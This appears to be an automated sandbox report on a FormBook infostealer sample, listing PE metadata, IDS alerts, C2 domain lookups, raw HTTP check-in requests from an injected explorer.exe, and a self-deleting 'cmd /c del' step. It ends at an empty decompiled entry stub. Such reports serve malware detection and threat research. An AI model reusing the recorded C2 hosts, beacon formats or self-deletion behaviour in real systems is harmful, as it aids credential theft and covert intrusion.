                                      • [EXP] VC++ 6.0 SP5 build 8804

                                      Data Directories

                                      | Name | Virtual Address | Virtual Size | Is in Section |
                                      |---|---|---|---|
                                      | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
                                      | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7524 | 0xa0 | .rdata |
                                      | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x9e0 | .rsrc |
                                      | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
                                      | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
                                      | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
                                      | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
                                      | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
                                      | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
                                      | IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
                                      | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
                                      | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
                                      | IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata |
                                      | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
                                      | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
                                      | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                                      Sections

                                      | Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                                      |---|---|---|---|---|---|---|---|---|
                                      | .text | 0x1000 | 0x5e66 | 0x6000 | False | 0.670572916667 | data | 6.44065573436 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
                                      | .rdata | 0x7000 | 0x12a2 | 0x1400 | False | 0.4455078125 | data | 5.0583287871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                                      | .data | 0x9000 | 0x25d18 | 0x600 | False | 0.458984375 | data | 4.18773476617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
                                      | .ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                                      | .rsrc | 0x37000 | 0x9e0 | 0xa00 | False | 0.45390625 | data | 4.4968702957 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

                                      Resources

                                      | Name | RVA | Size | Type | Language | Country |
                                      |---|---|---|---|---|---|
                                      | RT_ICON | 0x37190 | 0x2e8 | data | English | United States |
                                      | RT_DIALOG | 0x37478 | 0x100 | data | English | United States |
                                      | RT_DIALOG | 0x37578 | 0x11c | data | English | United States |
                                      | RT_DIALOG | 0x37698 | 0x60 | data | English | United States |
                                      | RT_GROUP_ICON | 0x376f8 | 0x14 | data | English | United States |
                                      | RT_MANIFEST | 0x37710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States |

                                      Imports

                                      | DLL | Import |
                                      |---|---|
                                      | KERNEL32.dll | GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary |
                                      | USER32.dll | SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA |
                                      | GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
                                      | SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA |
                                      | ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA |
                                      | COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
                                      | ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |

                                      Possible Origin

                                      | Language of compilation system | Country where language is spoken |
                                      |---|---|
                                      | English | United States |

                                      Network Behavior

                                      Snort IDS Alerts

                                      | Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
                                      |---|---|---|---|---|---|---|---|
                                      | 09/28/21-08:05:19.560904 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49777 | 34.102.136.180 | 192.168.2.5 |
                                      | 09/28/21-08:05:24.814123 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49781 | 109.106.246.165 | 192.168.2.5 |
                                      | 09/28/21-08:05:30.271587 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49782 | 80 | 192.168.2.5 | 154.208.173.139 |
                                      | 09/28/21-08:05:30.271587 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49782 | 80 | 192.168.2.5 | 154.208.173.139 |
                                      | 09/28/21-08:05:30.271587 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49782 | 80 | 192.168.2.5 | 154.208.173.139 |

                                      Network Port Distribution

                                      TCP Packets


                                      UDP Packets


                                      DNS Queries

                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                      Sep 28, 2021 08:04:53.894303083 CEST | 192.168.2.5 | 8.8.8.8 | 0x1e47 | Standard query (0) | www.appleluis.host | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:04:58.961429119 CEST | 192.168.2.5 | 8.8.8.8 | 0xcff7 | Standard query (0) | www.snackithalal.com | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:04.024564028 CEST | 192.168.2.5 | 8.8.8.8 | 0x3c1c | Standard query (0) | www.patrickandmaxine.com | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:09.217550993 CEST | 192.168.2.5 | 8.8.8.8 | 0x1c69 | Standard query (0) | www.4-6-2.com | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:19.275244951 CEST | 192.168.2.5 | 8.8.8.8 | 0xa4e2 | Standard query (0) | www.teelandcompany.com | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:24.617837906 CEST | 192.168.2.5 | 8.8.8.8 | 0x3623 | Standard query (0) | www.nailsestetic.space | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:29.822536945 CEST | 192.168.2.5 | 8.8.8.8 | 0x954b | Standard query (0) | www.futurodr.com | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:35.557977915 CEST | 192.168.2.5 | 8.8.8.8 | 0x72a2 | Standard query (0) | www.babeshotnud.com | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:41.055377007 CEST | 192.168.2.5 | 8.8.8.8 | 0xe8f5 | Standard query (0) | www.thenewtocsin.com | A (IP address) | IN (0x0001)

                                      DNS Answers

                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                      Sep 28, 2021 08:04:53.930164099 CEST | 8.8.8.8 | 192.168.2.5 | 0x1e47 | No error (0) | www.appleluis.host | appleluis.host |  | CNAME (Canonical name) | IN (0x0001)
                                      Sep 28, 2021 08:04:59.015763998 CEST | 8.8.8.8 | 192.168.2.5 | 0xcff7 | Name error (3) | www.snackithalal.com | none | none | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:04.061494112 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c1c | No error (0) | www.patrickandmaxine.com | www35.wixdns.net |  | CNAME (Canonical name) | IN (0x0001)
                                      Sep 28, 2021 08:05:04.061494112 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c1c | No error (0) | www35.wixdns.net | balancer.wixdns.net |  | CNAME (Canonical name) | IN (0x0001)
                                      Sep 28, 2021 08:05:04.061494112 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c1c | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net |  | CNAME (Canonical name) | IN (0x0001)
                                      Sep 28, 2021 08:05:04.061494112 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c1c | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net |  | CNAME (Canonical name) | IN (0x0001)
                                      Sep 28, 2021 08:05:04.061494112 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c1c | No error (0) | td-balancer-euw2-6-109.wixdns.net |  | 35.246.6.109 | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:09.243758917 CEST | 8.8.8.8 | 192.168.2.5 | 0x1c69 | Name error (3) | www.4-6-2.com | none | none | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:19.298926115 CEST | 8.8.8.8 | 192.168.2.5 | 0xa4e2 | No error (0) | www.teelandcompany.com | teelandcompany.com |  | CNAME (Canonical name) | IN (0x0001)
                                      Sep 28, 2021 08:05:19.298926115 CEST | 8.8.8.8 | 192.168.2.5 | 0xa4e2 | No error (0) | teelandcompany.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:24.640343904 CEST | 8.8.8.8 | 192.168.2.5 | 0x3623 | No error (0) | www.nailsestetic.space | nailsestetic.space |  | CNAME (Canonical name) | IN (0x0001)
                                      Sep 28, 2021 08:05:24.640343904 CEST | 8.8.8.8 | 192.168.2.5 | 0x3623 | No error (0) | nailsestetic.space |  | 109.106.246.165 | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:30.004734039 CEST | 8.8.8.8 | 192.168.2.5 | 0x954b | No error (0) | www.futurodr.com |  | 154.208.173.139 | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:35.594989061 CEST | 8.8.8.8 | 192.168.2.5 | 0x72a2 | No error (0) | www.babeshotnud.com |  | 185.107.56.60 | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:41.079232931 CEST | 8.8.8.8 | 192.168.2.5 | 0xe8f5 | No error (0) | www.thenewtocsin.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001)
                                      Sep 28, 2021 08:05:41.079232931 CEST | 8.8.8.8 | 192.168.2.5 | 0xe8f5 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.212 | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:41.079232931 CEST | 8.8.8.8 | 192.168.2.5 | 0xe8f5 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.217 | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:41.079232931 CEST | 8.8.8.8 | 192.168.2.5 | 0xe8f5 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.216 | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:41.079232931 CEST | 8.8.8.8 | 192.168.2.5 | 0xe8f5 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.215 | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:41.079232931 CEST | 8.8.8.8 | 192.168.2.5 | 0xe8f5 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.218 | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:41.079232931 CEST | 8.8.8.8 | 192.168.2.5 | 0xe8f5 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.210 | A (IP address) | IN (0x0001)
                                      Sep 28, 2021 08:05:41.079232931 CEST | 8.8.8.8 | 192.168.2.5 | 0xe8f5 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.211 | A (IP address) | IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.patrickandmaxine.com
                                      • www.teelandcompany.com
                                      • www.nailsestetic.space
                                      • www.futurodr.com
                                      • www.babeshotnud.com

                                      HTTP Packets

                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      0 | 192.168.2.5 | 49775 | 35.246.6.109 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Sep 28, 2021 08:05:04.103997946 CEST | 5759 | OUT | GET /rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc HTTP/1.1
                                      Host: www.patrickandmaxine.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Sep 28, 2021 08:05:04.181961060 CEST | 5760 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Tue, 28 Sep 2021 06:05:04 GMT
                                      Content-Length: 0
                                      Connection: close
                                      location: https://www.patrickandmaxine.com/rgoe?3fph-P=SDpSJcP09%2FDC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc
                                      strict-transport-security: max-age=120
                                      x-wix-request-id: 1632809104.12353479359118688
                                      Age: 0
                                      Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                      X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVi5yDv3kmVKOr5HAuRayZgu,qquldgcFrj2n046g4RNSVGDCtDC/zjI7y/qL/ByVDnpYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalmNz/RuQP3rtdZ/RMDvoHeVyBqs9bMu3gZEQ/tjE7tv/3fKEXQvQlSAkB/lstal9R3MFzREVKyPFapXmT9a+sC4=,2UNV7KOq4oGjA5+PKsX47IJCkNcL1UXXT2AxlbYijuBYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,LXlT8qjS5x6WBejJA3+gBbk0oko9S7vJ2Ws8rbzPIcRNG+KuK+VIZfbNzHJu0vJu,UvY1uiXtmgas6aI2l+unv5E44X1eKbavIjeRM6T+g8dJRdfVwrOGfuCHlvTHdkToWIHlCalF7YnfvOr2cMPpyw==
                                      Cache-Control: no-cache
                                      X-Content-Type-Options: nosniff
                                      Server: Pepyaka/1.19.10


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      1 | 192.168.2.5 | 49777 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Sep 28, 2021 08:05:19.317270994 CEST | 5770 | OUT | GET /rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc HTTP/1.1
                                      Host: www.teelandcompany.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Sep 28, 2021 08:05:19.560904026 CEST | 5771 | IN | HTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Tue, 28 Sep 2021 06:05:19 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "61525017-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      2 | 192.168.2.5 | 49781 | 109.106.246.165 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Sep 28, 2021 08:05:24.666732073 CEST | 5784 | OUT | GET /rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc HTTP/1.1
                                      Host: www.nailsestetic.space
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Sep 28, 2021 08:05:24.814122915 CEST | 5785 | IN | HTTP/1.1 403 Forbidden
                                      Content-Type: text/html
                                      Cache-Control: no-cache, no-store, must-revalidate
                                      Pragma: no-cache
                                      Expires: 0
                                      Server: BitNinja Captcha Server
                                      Date: Tue, 28 Sep 2021 06:05:24 GMT
                                      Content-Length: 13724
                                      Connection: close
                                      Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-align: center;} .link {margin-top: 40px;}


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      3 | 192.168.2.5 | 49782 | 154.208.173.139 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Sep 28, 2021 08:05:30.271586895 CEST | 5799 | OUT | GET /rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc HTTP/1.1
                                      Host: www.futurodr.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      4 | 192.168.2.5 | 49783 | 185.107.56.60 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Sep 28, 2021 08:05:35.629242897 CEST | 5800 | OUT | GET /rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc HTTP/1.1
                                      Host: www.babeshotnud.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Sep 28, 2021 08:05:36.039222956 CEST | 5800 | IN | HTTP/1.1 302 Found
                                      cache-control: max-age=0, private, must-revalidate
                                      connection: close
                                      content-length: 11
                                      date: Tue, 28 Sep 2021 06:05:35 GMT
                                      location: http://survey-smiles.com
                                      server: nginx
                                      set-cookie: sid=18c140ce-2022-11ec-a1ad-e2db040519d9; path=/; domain=.babeshotnud.com; expires=Sun, 16 Oct 2089 09:19:43 GMT; max-age=2147483647; HttpOnly
                                      Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                      Data Ascii: Redirecting


                                      Code Manipulations

                                      System Behavior

                                      General

                                      Start time: 08:03:33
                                      Start date: 28/09/2021
                                      Path: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
                                      Wow64 process (32bit): true
                                      Commandline: 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
                                      Imagebase: 0x400000
                                      File size: 267109 bytes
                                      MD5 hash: 85589170AF713A03CA622F94429C634A
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Start time: 08:03:35
                                      Start date: 28/09/2021
                                      Path: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
                                      Wow64 process (32bit): true
                                      Commandline: 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
                                      Imagebase: 0x400000
                                      File size: 267109 bytes
                                      MD5 hash: 85589170AF713A03CA622F94429C634A
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Start time:08:03:43
                                      Start date:28/09/2021
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff693d90000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:high

                                      General

                                      Start time:08:04:11
                                      Start date:28/09/2021
                                      Path:C:\Windows\SysWOW64\autoconv.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\SysWOW64\autoconv.exe
                                      Imagebase:0xd10000
                                      File size:851968 bytes
                                      MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Start time:08:04:11
                                      Start date:28/09/2021
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\wscript.exe
                                      Imagebase:0x1060000
                                      File size:147456 bytes
                                      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:high

                                      General

                                      Start time:08:04:14
                                      Start date:28/09/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
                                      Imagebase:0x150000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:08:04:15
                                      Start date:28/09/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7ecfc0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Disassembly

                                      Code Analysis

                                        Executed Functions

                                        C-Code - Quality: 78%
                                        			_entry_() {
